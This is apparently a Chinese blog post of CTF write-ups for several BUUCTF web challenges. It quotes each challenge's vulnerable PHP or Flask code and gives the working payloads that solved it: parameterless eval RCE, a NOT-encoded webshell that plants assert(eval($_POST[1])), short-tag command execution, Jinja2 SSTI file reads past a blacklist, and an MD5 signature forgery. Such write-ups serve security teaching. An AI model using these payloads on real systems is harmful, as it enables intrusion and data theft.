buu练习5

前言

凑字数用的，前言总要有点字在不显得空荡荡的。

[GXYCTF2019]禁止套娃

上来啥都没有，经过尝试信息搜集发现是git源码泄露，用GitHack获取源码：

<?php
include "flag.php";
echo "flag在哪里呢？<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦！");
            }
        }
        else{
            die("再好好想想！");
        }
    }
    else{
        die("还想读flag，臭弟弟！");
    }
}
// highlight_file(__FILE__);
?>

过滤了伪协议相关的语句以及一些关键词，同时进行参数匹配，因此这是典型的无参数rce，这不巧了，前两天刚写的博客，因此直接用无参数rce的payload打就可以了。

由于过滤了et，因此之前博客写的一些函数不能用了，这里要用下面这个函数：

• localconv():函数返回一包含本地数字及货币格式信息的数组

我们用这个函数来获取第一个目录，即.，当前目录，然后扫目录找到flag文件读取就可以了，payload：

?exp=show_source(next(array_reverse(scandir(current(localeconv())))));

[极客大挑战 2019]RCE ME

审计源码：

 <?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

很明显的无字符webshell，取反即可，但是我们发现phpinfo中过滤了大部分函数，因此我们不能直接rce。

既然如此，先上传一句马：

?code=(~%9e%8c%8c%9a%8d%8b)(~%9a%89%9e%93%d7%db%a0%af%b0%ac%ab%a4%ce%a2%d6);

//assert(eval($_POST[1]));

在根目录下找到flag，但是不能直接读取，这里用蚁剑中的绕过disabled_functions插件，在虚拟终端中执行/readflag读取flag。

[MRCTF2020]套娃

进入网页在审查元素中发现部分源码：

//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
!

代码中要求获取的变量名不含有_，用%20代替即可，而下面的内容匹配比较常规，用换行符绕过即可：

?b%20u%20p%20t=23333%0A

接着提示我们下一步在secrettw.php文件中，访问发现由于ip不匹配，我们不能访问。但是在审查元素中发现jsfuck，控制台跑一下发现让我们POST一个Merak进去，随便POST之后得到源码：

Flag is here~But how to get it? <?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?> 

审计代码，我们发现后端对ip进行了限制，对2333的内容进行了匹配，对file进行了change()，因此我们只要针对这三点绕过就可以了。

先反写flag.php：

<?php
function unchange($v){ 

    $re = '';
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) - $i*2 ); 
    } 
    return $re; 
}



$file = unchange('flag.php');

echo base64_encode($file);
?>
//ZmpdYSZmXGI=

payload：

?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=&file=ZmpdYSZmXGI=

Client-IP: 127.0.0.1

[红明谷CTF 2021]write_shell

审计源码：

 <?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>

我们要上传两个参数，action表示模式，data表示写入index.php中的内容。发现waf把php过滤了，因此要用到短标签，而空格被过滤，在php中可以用%09替代，payload：

?action=upload&data=<?echo%09`ls%09/`?>

写入后访问pwd给出的路径，即可发现命令被执行，因此我们读取flag文件：

?action=upload&data=<?echo%09`cat%09/flllllll1112222222lag`?>

[GYCTF2020]FlaskApp

有一个base64加密与base64解密网页，将{{2+2}}进行base64加密后进行解密，发现结果为4，说明存在ssti。但是构建payload的时候发现有东西被过滤了，这里要bypass。

根据提示发现debug页面，发现源码为app.py，因此是python flask。

我们先读取源码：

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}

发现waf：

def waf(str): black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"] for x in black_list : if x in str.lower() : return 1 @app.route('/hint',methods=['GET']) def hint(): txt = "失败乃成功之母！！&#34

html解码：

"flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"

因此这里需要进行字符串拼接，遍历目录payload：

payload1:
{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}

payload2:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

读取flag：

payload1:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}

payload2:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}

[WesternCTF2018]shrine

看到题目就想到应该是shrine模板注入，进行测试：

/shrine/{{2+2}}

回显是4，说明存在ssti。推测{undefined{config}}可查看所有app.config内容，但是这题设了黑名单[‘config’,‘self’]并且过滤了括号。不过python还有一些内置函数，比如url_for和get_flashed_messages。

payload：

/shrine/{{url_for.__globals__['current_app'].config}}

/shrine/{{get_flashed_messages.__globals__['current_app'].config}}

/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

均可得到flag。

[De1CTF 2019]SSRF Me

进入网页看着一串代码头都大了，自己重新编辑下：

#! /usr/bin/env python
# #encoding=utf-8
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json
reload(sys)
sys.setdefaultencoding('latin1')
 
app = Flask(__name__)
 
secert_key = os.urandom(16)
 
class Task:
    def __init__(self, action, param, sign, ip):
        self.action = action
        self.param = param
        self.sign = sign
        self.sandbox = md5(ip)
        if(not os.path.exists(self.sandbox)):
            os.mkdir(self.sandbox)
 
    def Exec(self):
        result = {}
        result['code'] = 500
        if (self.checkSign()):
            if "scan" in self.action:
                tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
                resp = scan(self.param)
                if (resp == "Connection Timeout"):
                    result['data'] = resp
                else:
                    print resp
                    tmpfile.write(resp)
                    tmpfile.close()
                result['code'] = 200
            if "read" in self.action:
                f = open("./%s/result.txt" % self.sandbox, 'r')
                result['code'] = 200
                result['data'] = f.read()
            if result['code'] == 500:
                result['data'] = "Action Error"
        else:
            result['code'] = 500
            result['msg'] = "Sign Error"
        return result
 
    def checkSign(self):
        if (getSign(self.action, self.param) == self.sign):
            return True
        else:
            return False
 
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)
 
@app.route('/De1ta',methods=['GET','POST'])
def challenge():
    action = urllib.unquote(request.cookies.get("action"))
    param = urllib.unquote(request.args.get("param", ""))
    sign = urllib.unquote(request.cookies.get("sign"))
    ip = request.remote_addr
    if(waf(param)):
        return "No Hacker!!!!"
    task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())
 
@app.route('/')
def index():
    return open("code.txt","r").read()
 
def scan(param):
    socket.setdefaulttimeout(1)
    try:
        return urllib.urlopen(param).read()[:50]
    except:
        return "Connection Timeout"
 
def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()
 
def md5(content):
    return hashlib.md5(content).hexdigest()
 
def waf(param):
    check=param.strip().lower()
    if check.startswith("gopher") or check.startswith("file"):
        return True
    else:
        return False
if __name__ == '__main__':
    app.debug = False
    app.run(host='0.0.0.0',port=9999)

看起来挺复杂的，但核心其实就两个路由：/geneSign和/De1ta。我们发现/geneSign路由是将param和action拼接而成的，接着返回到getSign()中，进行md5加密。

接着是/De1ta路由，在这个路由中获取三个变量，GET获取param，Cookie获取action和sign，在检查的时候要满足getSign(self.action, self.param) == self.sign。

因此我们这样构建payload，首先：

/geneSign?param=flag.txtread

//175fadbcd603662b8637028cae3aaf1e

这样相当于我们获得了一个flag.txtreadscan的sign值，接着：

/De1ta?param=flag.txt
Cookie: action=readscan;sign=175fadbcd603662b8637028cae3aaf1e

这相当于我们的getSign(self.action, self.param)为flag.txt+readscan，和sign对应上了，而这样又能将param中文件内容读出并返回给我们，以此获取flag。